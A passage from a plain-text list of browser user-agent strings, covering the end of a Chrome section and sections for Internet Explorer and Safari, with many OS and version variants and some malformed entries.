AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.133 Chrome/10.0.648.133 Safari/534.16\nMozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 SUSE/10.0.626.0 (KHTML, like Gecko) Chrome/10.0.626.0 Safari/534.16\nMozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.417.0 Safari/534.1\nMozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1\nMozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3\nMozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.470.0 Safari/534.3\nMozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1\nMozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0\nMozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/8.1.0.0 Safari/540.0\nMozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.15) Gecko/20101027 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10\nMozilla/5.0 (X11; U; Linux x86_64; fr-FR) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7\nMozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3\nMozilla/5.0 (X11; U; Slackware Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.30 Safari/532.5\nMozilla/5.0 (X11; U; Windows NT 6; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.587.0 Safari/534.12\nMozilla/5.0 (X11; U; x86_64 Linux; en_GB, en_US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.358.0 Safari/533.3\nMozilla/6.0 (Windows; U; Windows NT 6.0; en-US) Gecko/2009032609 Chrome/2.0.172.6 Safari/530.7\nMozilla/6.0 (Windows; U; Windows NT 6.0; en-US) Gecko/2009032609 (KHTML, like Gecko) Chrome/2.0.172.6 Safari/530.7\nMozilla/6.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0\n\n# Microsoft Internet Explorer\n\nMozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)\nMozilla/4.0 (Compatible; MSIE 4.0)\nMozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)\nMozilla/4.0 (compatible; MSIE 4.01; Windows 95)\nMozilla/4.0 (compatible; MSIE 4.01; Windows 98)\nMozilla/4.0 (compatible; MSIE 4.01; Windows 98; DigExt)\nMozilla/4.0 (compatible; MSIE 4.01; Windows 98; Hotbar 3.0)\nMozilla/4.0 (compatible; MSIE 4.01; Windows CE)\nMozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC)\nMozilla/4.0 (compatible; MSIE 4.01; Windows NT)\nMozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)\nMozilla/4.0 (compatible; MSIE 4.0; Windows 95)\nMozilla/4.0 (compatible; MSIE 4.0; Windows 95; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\nMozilla/4.0 (compatible; MSIE 4.0; Windows 98)\nMozilla/4.0 (compatible; MSIE 4.0; Windows NT)\nMozilla/4.0 (compatible; MSIE 4.5; Mac_PowerPC)\nMozilla/4.0 (compatible; MSIE 4.5; Windows 98;)\nMozilla/4.0 (compatible; MSIE 4.5; Windows NT 5.1; .NET CLR 2.0.40607)\nMozilla/4.0 (compatible; MSIE 5.00; Windows 98)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Q312461)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Q312461; T312461)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; SV1)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; SV1; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Wanadoo 5.1)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Wanadoo 5.3; Wanadoo 5.5)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Wanadoo 5.6)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.0.0)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.0.0; Hotbar 4.1.8.0)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.2.4)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.2.6)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.2.6; Hotbar 3.0)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.2.6; Hotbar 4.2.8.0)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.2.6; MSIECrawler)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT; DigExt)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT; Hotbar 4.1.8.0)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT; .NET CLR 1.0.3705)\nMozilla/4.0 (compatible; MSIE 5.01; Windows NT; YComp 5.0.0.0)\nMozilla/4.0 (compatible; MSIE 5.05; Windows 98; .NET CLR 1.1.4322)\nMozilla/4.0 (compatible; MSIE 5.05; Windows NT 3.51)\nMozilla/4.0 (compatible; MSIE 5.05; Windows NT 4.0)\nMozilla/4.0 (compatible; MSIE 5.0b1; Mac_PowerPC)\nMozilla/4.0 (compatible; MSIE 5.0; Windows 98;)\nMozilla/4.0(compatible; MSIE 5.0; Windows 98; DigExt)\nMozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; YComp 5.0.2.6)\nMozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; YComp 5.0.2.6; yplus 1.0)\nMozilla/4.0 (compatible; MSIE 5.0; Windows 98; Hotbar 3.0)\nMozilla/4.0 (compatible; MSIE 5.0; Windows 98; YComp 5.0.2.4)\nMozilla/4.0 (compatible; MSIE 5.0; Windows NT;)\nMozilla/4.0 (compatible; MSIE 5.0; Windows NT)\nMozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0)\nMozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.2; .NET CLR 1.1.4322)\nMozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.9; .NET CLR 1.1.4322)\nMozilla/4.0 (compatible; MSIE 5.0; Windows NT 6.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.04506.648; .NET4.0C; .NET4.0E)\nMozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)\nMozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; Hotbar 3.0)\nMozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; Hotbar 4.1.8.0)\nMozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; .NET CLR 1.0.3705)\nMozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; YComp 5.0.0.0)\nMozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; YComp 5.0.2.5)\nMozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; YComp 5.0.2.6)\nMozilla/4.0 (compatible; MSIE 5.12; Mac_PowerPC)\nMozilla/4.0 (compatible; MSIE 5.13; Mac_PowerPC)\nMozilla/4.0 (compatible; MSIE 5.14; Mac_PowerPC)\nMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)\nMozilla/4.0 (compatible; MSIE 5.16; Mac_PowerPC)\nMozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)\nMozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC Mac OS; en)\nMozilla/4.0 (compatible; MSIE 5.21; Mac_PowerPC)\nMozilla/4.0 (compatible; MSIE 5.22; Mac_PowerPC)\nMozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)\nMozilla/4.0 (compatible; MSIE 5.2; Mac_PowerPC)\nMozilla/4.0 (compatible; MSIE 5.5;)\nMozilla/4.0 (compatible; MSIE 5.50; Windows 95; SiteKiosk 4.8)\nMozilla/4.0 (compatible; MSIE 5.50; Windows 98; SiteKiosk 4.8)\nMozilla/4.0 (compatible; MSIE 5.50; Windows NT; SiteKiosk 4.8)\nMozilla/4.0 (compatible; MSIE 5.50; Windows NT; SiteKiosk 4.8; SiteCoach 1.0)\nMozilla/4.0 (compatible; MSIE 5.50; Windows NT; SiteKiosk 4.9; SiteCoach 1.0)\nMozilla/4.0 (compatible; MSIE 5.5b1; Mac_PowerPC)\nMozilla/4.0 (compatible;MSIE 5.5; Windows 98)\nMozilla/4.0 (compatible; MSIE 5.5; Windows NT)\nMozilla/4.0 (compatible; MSIE 5.5; Windows NT5)\nMozilla/4.0 (Compatible; MSIE 5.5; Windows NT5.0; Q312461; SV1; .NET CLR 1.1.4322; InfoPath.2)\nMozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\nMozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\nMozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.2; .NET CLR 1.1.4322)\nMozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; FDM)\nMozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.5)\nMozilla/4.0 (compatible; MSIE 5.5; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)\nMozilla/4.0 (compatible; MSIE 5.5; Windows NT 6.1; chromeframe/12.0.742.100; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)\nMozilla/4.0 (compatible; MSIE 5.5; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nMozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)\nMozilla/4.0 (compatible; MSIE 6.0b; Windows 98)\nMozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)\nMozilla/4.0 (compatible; MSIE 6.0b; Windows 98; YComp 5.0.0.0)\nMozilla/4.0 (compatible; MSIE 6.0b; Windows NT 4.0)\nMozilla/4.0 (compatible; MSIE 6.0b; Windows NT 4.0; .NET CLR 1.0.2914)\nMozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)\nMozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.3705)\nMozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.1.4322)\nMozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; YComp 5.0.0.0)\nMozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; YComp 5.0.2.6)\nMozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\nMozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1; DigExt)\nMozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1)\nMozilla/4.0 (compatible;MSIE 6.0;Windows 98;Q312461)\nMozilla/4.0 (compatible; MSIE 6.1; Windows XP)\nMozilla/4.0 (compatible; MSIE 6.1; Windows XP; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\nMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; FDM; .NET CLR 1.1.4322)\nMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)\nMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.0.3705; Media Center PC 3.1; Alexa Toolbar; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\nMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322)\nMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)\nMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)\nMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)\nMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)\nMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.40607)\nMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\nMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)\nMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)\nMozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0)\nMozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; chromeframe/12.0.742.100)\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; InfoPath.3; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8)\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; InfoPath.3)\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/6.0; .NET4.0E; .NET4.0C)\nMozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.3; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8)\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; msn OptimizedIE8;ZHCN)\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 3.0)\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\nMozilla/4.0 (compatible; U; MSIE 6.0; Windows NT 5.1)\nMozilla/4.0 (Compatible; Windows NT 5.1; MSIE 6.0) (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\nMozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1)\nMozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)\nMozilla/4.0 (MSIE 6.0; Windows NT 5.0)\nMozilla/4.0 (MSIE 6.0; Windows NT 5.1)\nMozilla/4.0 WebTV/2.6 (compatible; MSIE 4.0)\nMozilla/4.0 (Windows; MSIE 6.0; Windows NT 5.0)\nMozilla/4.0 (Windows; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nMozilla/4.0 (Windows; MSIE 6.0; Windows NT 5.2)\nMozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)\nMozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nMozilla/4.0 (X11; MSIE 6.0; i686; .NET CLR 1.1.4322; .NET CLR 2.0.50727; FDM)\nMozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)\nMozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)\nMozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)\nMozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\nMozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)\nMozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)\nMozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\nMozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)\nMozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325)\nMozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nMozilla/5.0 (compatible; MSIE 7.0; Windows 98; SpamBlockerUtility 6.3.91; SpamBlockerUtility 6.2.91; .NET CLR 4.1.89;GB)\nMozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/4.0; FBSMTWB; .NET CLR 2.0.34861; .NET CLR 3.0.3746.3218; .NET CLR 3.5.33652; msn OptimizedIE8;ENUS)\nMozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)\nMozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; en-US)\nMozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; fr-FR)\nMozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; c .NET CLR 3.0.04506; .NET CLR 3.5.30707; InfoPath.1; el-GR)\nMozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; c .NET CLR 3.0.04506; .NET CLR 3.5.30707; InfoPath.1; el-GR)\nMozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 3.0.04506.30)\nMozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)\nMozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)\nMozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\nMozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)\nMozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)\nMozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.8.36217; WOW64; en-US)\nMozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; .NET CLR 2.7.58687; SLCC2; Media Center PC 5.0; Zune 3.4; Tablet PC 3.6; InfoPath.3)\nMozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)\nMozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.1.76908; WOW64; en-US)\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.1; SV1; .NET CLR 2.8.52393; WOW64; en-US)\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) chromeframe/10.0.648.205\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/13.0.782.215)\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET CLR 1.1.4322; .NET4.0C; Tablet PC 2.0)\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; yie8)\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)\nMozilla/5.0 (MSIE 7.0; Macintosh; U; SunOS; X11; gu; SV1; InfoPath.2; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)\nMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko\nMozilla/5.0 (Windows; U; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nMozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)\nMozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; el-GR)\nMozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)\nMozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\n\n# Safari\n\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6) AppleWebKit/531.4 (KHTML, like Gecko) Version/4.0.3 Safari/531.4\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-au) AppleWebKit/525.8+ (KHTML, like Gecko) Version/3.1 Safari/525.6\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-gb) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.7 (KHTML, like Gecko) Version/3.1 Safari/525.7\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.9 (KHTML, like Gecko) Version/3.1 Safari/525.9\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/526.1+ (KHTML, like Gecko) Version/3.1 Safari/525.13\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; es-es) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; fr-fr) AppleWebKit/525.9 (KHTML, like Gecko) Version/3.1 Safari/525.9\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; it-it) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; ja-jp) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; pt-br) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; en-ca) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; es-es) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; hu-hu) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; nb-no) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; nl-nl) AppleWebKit/527+ (KHTML, like Gecko) Version/3.1.1 Safari/525.20\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 